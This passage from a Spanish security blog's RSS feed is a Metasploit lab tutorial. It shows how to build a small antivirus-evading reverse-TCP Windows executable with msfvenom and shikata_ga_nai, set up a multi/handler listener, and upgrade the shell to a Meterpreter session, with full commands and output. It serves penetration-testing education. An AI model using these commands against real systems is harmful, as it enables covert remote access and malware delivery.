&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/eHXgO7HHcmA" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/eHXgO7HHcmA/viproy-voip-penetration-testing-kit.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-cX1G_wpBwCg/UWaVkGh1X4I/AAAAAAAAEQ8/_xnj_eMi8DI/s72-c/VIProy_cabecera.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/04/viproy-voip-penetration-testing-kit.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-5534388627193416594</guid><pubDate>Wed, 10 Apr 2013 15:00:00 +0000</pubDate><atom:updated>2013-04-10T18:11:16.523+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">ST2Labs</category><category domain="http://www.blogger.com/atom/ns#">Pentesting</category><category domain="http://www.blogger.com/atom/ns#">Meterpreter</category><category domain="http://www.blogger.com/atom/ns#">Pentester</category><category domain="http://www.blogger.com/atom/ns#">Metasploit</category><category domain="http://www.blogger.com/atom/ns#">Update</category><category domain="http://www.blogger.com/atom/ns#">Shell</category><title>[Metasploit] Convertir una simple SHELL en una sesión de METERPRETER</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-xSyeGGoJyYI/UWKEMwGm0HI/AAAAAAAAEPc/r59jczayNfw/s1600/Metasploit_Shell_to_meterpreter.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-xSyeGGoJyYI/UWKEMwGm0HI/AAAAAAAAEPc/r59jczayNfw/s1600/Metasploit_Shell_to_meterpreter.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
En el artículo de hoy, voy a realizar los pasos necesarios para convertir una simple shell en una sesión de meterpreter. Esto puede resultar muy util, sobretodo si durante el test de pentración te ves obligado a usar una shell simple por ser un archivo de reducidas dimensiones y tener cierta capacidad de evasión de IDS/IPS/AV.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-kDEryundpz0/UUrrBdHCA9I/AAAAAAAAEKE/pnlUxlV_i-g/s1600/ST2Labs_vmware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="230" src="http://2.bp.blogspot.com/-kDEryundpz0/UUrrBdHCA9I/AAAAAAAAEKE/pnlUxlV_i-g/s640/ST2Labs_vmware.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;span style="color: white; font-size: x-small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;span style="color: white;"&gt;&lt;b&gt;#ST2Labs &amp;nbsp; &amp;nbsp; &lt;span style="font-size: x-small;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="background-color: #e06666; color: white;"&gt;&lt;b&gt;&amp;gt;&amp;gt; Paso 1:&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #666666; color: white;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: #666666;"&gt;&lt;span style="color: white;"&gt;Generación de una shell de reducidas dimensiones &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;span style="color: white;"&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Tal y como ya vimos en su momento en mis otros artículos (&lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payloads.html" target="_blank"&gt;I&lt;/a&gt;, &lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payload2.html" target="_blank"&gt;II&lt;/a&gt; y &lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payload3.html" target="_blank"&gt;III&lt;/a&gt;), se procederá a generar un ejecutable EXE con una shell reversa_tcp, utilizando técnicas de evasión de antivirus y reducción de tamaño.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: #cccccc;"&gt;&lt;b&gt;root@ST2Labs:~#&lt;/b&gt; msfvenom -p windows/shell/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00\x0d\x0a\x20' -f exe-small LHOST=192.168.2.105 LPORT=80 &amp;gt; /tmp/tcpviewshell.exe&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Se obtiene:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;tcpviewshell.exe (~ 5K)&lt;/b&gt; | En &lt;a href="https://www.virustotal.com/es/file/4684f19fa27ae5d7baf86aabf854ba61d29c444b627eb08305afcedc01a906ca/analysis/" target="_blank"&gt;virustotal&lt;/a&gt; se obtiene un 17/45 (37%) de detección, donde algunos de los principales sistemas antivirus no lo detectan, ver informe utilizando el siguiente SHA256:&amp;nbsp;&lt;span style="background-color: white; color: #333333; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px; line-height: 20px;"&gt;4684f19fa27ae5d7baf86aabf854ba61d29c444b627eb08305afcedc01a906ca&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="background-color: #e06666; color: white;"&gt;&amp;gt;&amp;gt; Paso 2:&lt;/span&gt;&lt;/b&gt;&lt;span style="background-color: #666666;"&gt; &lt;span style="color: white;"&gt;&amp;nbsp;Configurando Metasploit para gestionar la conexión inversa en el puerto 80 &amp;nbsp; &amp;nbsp;&lt;/span&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Para ello utilizaremos el comando &lt;b&gt;msfconsole&lt;/b&gt;, tal como sigue a&amp;nbsp;continuación:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;msf &amp;gt; use exploit/multi/handler&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;msf &amp;nbsp;exploit(handler) &amp;gt; set payload windows/shell/reverse_tcp&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;payload =&amp;gt; windows/shell/reverse_tcp&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;msf &amp;nbsp;exploit(handler) &amp;gt; set LPORT 80&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;LPORT =&amp;gt; 80&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;msf &amp;nbsp;exploit(handler) &amp;gt; set LHOST 192.168.2.105&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;LHOST =&amp;gt; 192.168.2.105&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #eeeeee; font-size: x-small;"&gt;msf &amp;nbsp;exploit(handler) &amp;gt; set EnableContextEncoding true&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;msf &amp;nbsp;exploit(handler) &amp;gt; exploit -j -z&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Exploit running as background job.&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Started reverse handler on 192.168.2.105:80&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Starting the payload handler...&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;span style="color: white;"&gt;&amp;gt;&amp;gt; Paso 3:&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: #666666;"&gt;&lt;span style="color: white;"&gt; &amp;nbsp;Ejecutando el archivo tcpviewshell.exe en Windows XP SP3 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
Se obtiene el siguiente resultado:&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-9pXcbe4I0NM/UUyQtjuNLmI/AAAAAAAAEOw/J2BP-X1m0GY/s1600/MSF_shell_to_meterpreter_3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="234" src="http://1.bp.blogspot.com/-9pXcbe4I0NM/UUyQtjuNLmI/AAAAAAAAEOw/J2BP-X1m0GY/s640/MSF_shell_to_meterpreter_3.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;span style="background-color: #e06666;"&gt;&lt;span style="color: white;"&gt;&amp;gt;&amp;gt; Paso 4:&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: #666666; color: white;"&gt; &amp;nbsp;Convirtiendo una shell simple en una sesión de Meterpreter &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Ahora, realizamos el upgrading de la shell win32 a meterpreter session | Lo que realmente se realiza es subir un archivo al equipo remoto utilizando el comando echo.&lt;br /&gt;
&lt;br /&gt;
Para realizar el updating se ejecuta el comando&lt;span style="background-color: #e06666;"&gt;&lt;span style="color: white;"&gt; session -u [Id_session_shell]&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;&lt;b&gt;msf &amp;nbsp;exploit(handler) &amp;gt; sessions -u 1&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Started reverse handler on 192.168.2.105:80&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Starting the payload handler...&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 1.66% done (1699/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 3.33% done (3398/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 4.99% done (5097/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 6.66% done (6796/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 8.32% done (8495/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 9.98% done (10194/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 11.65% done (11893/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 13.31% done (13592/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 14.98% done (15291/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 16.64% done (16990/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 18.30% done (18689/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 19.97% done (20388/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 21.63% done (22087/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 23.29% done (23786/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 24.96% done (25485/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 26.62% done (27184/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 28.29% done (28883/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 29.95% done (30582/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 31.61% done (32281/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 33.28% done (33980/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 34.94% done (35679/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 36.61% done (37378/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 38.27% done (39077/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 39.93% done (40776/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 41.60% done (42475/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 43.26% done (44174/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 44.93% done (45873/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 46.59% done (47572/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 48.25% done (49271/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 49.92% done (50970/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 51.58% done (52669/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 53.25% done (54368/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 54.91% done (56067/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 56.57% done (57766/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 58.24% done (59465/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 59.90% done (61164/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 61.57% done (62863/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 63.23% done (64562/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 64.89% done (66261/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 66.56% done (67960/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 68.22% done (69659/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 69.88% done (71358/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 71.55% done (73057/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 73.21% done (74756/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 74.88% done (76455/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 76.54% done (78154/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 78.20% done (79853/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 79.87% done (81552/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 81.53% done (83251/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 83.20% done (84950/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 84.86% done (86649/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 86.52% done (88348/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 88.19% done (90047/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 89.85% done (91746/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 91.52% done (93445/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 93.18% done (95144/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 94.84% done (96843/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 96.51% done (98542/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 98.15% done (100216/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 99.78% done (101888/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Command Stager progress - 100.00% done (102108/102108 bytes)&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;[*] Sending stage (752128 bytes) to 192.168.2.137&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;msf &amp;nbsp;exploit(handler) &amp;gt; sess[*] Meterpreter session 2 opened (192.168.2.105:80 -&amp;gt; 192.168.2.137:1107) at 2013-03-22 18:03:07 +0100&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #cccccc; font-size: x-small;"&gt;ions&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Finalmente se obtiene una segunda sesión remota con una interfaz meterpreter, véase la imagen siguiente:&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-XALc5mOMxQE/UUyToNmMeLI/AAAAAAAAEO4/PudefkLhD7w/s1600/MSF_shell_to_meterpreter_4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="550" src="http://2.bp.blogspot.com/-XALc5mOMxQE/UUyToNmMeLI/AAAAAAAAEO4/PudefkLhD7w/s640/MSF_shell_to_meterpreter_4.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Updating win32 shell to meterpreter.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
ST2Labs&lt;br /&gt;
#Pentesting Rulez!&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-S1Nt6dDSSCI/UUsSlA9bZcI/AAAAAAAAELU/rKRBbonz9as/s1600/ST2Labs_botton_head.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-S1Nt6dDSSCI/UUsSlA9bZcI/AAAAAAAAELU/rKRBbonz9as/s1600/ST2Labs_botton_head.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=8SwXdaZm_Q8:OmdXPN0PIyU:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=8SwXdaZm_Q8:OmdXPN0PIyU:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=8SwXdaZm_Q8:OmdXPN0PIyU:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=8SwXdaZm_Q8:OmdXPN0PIyU:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=8SwXdaZm_Q8:OmdXPN0PIyU:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=8SwXdaZm_Q8:OmdXPN0PIyU:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=8SwXdaZm_Q8:OmdXPN0PIyU:V_sGLiPBpWU" 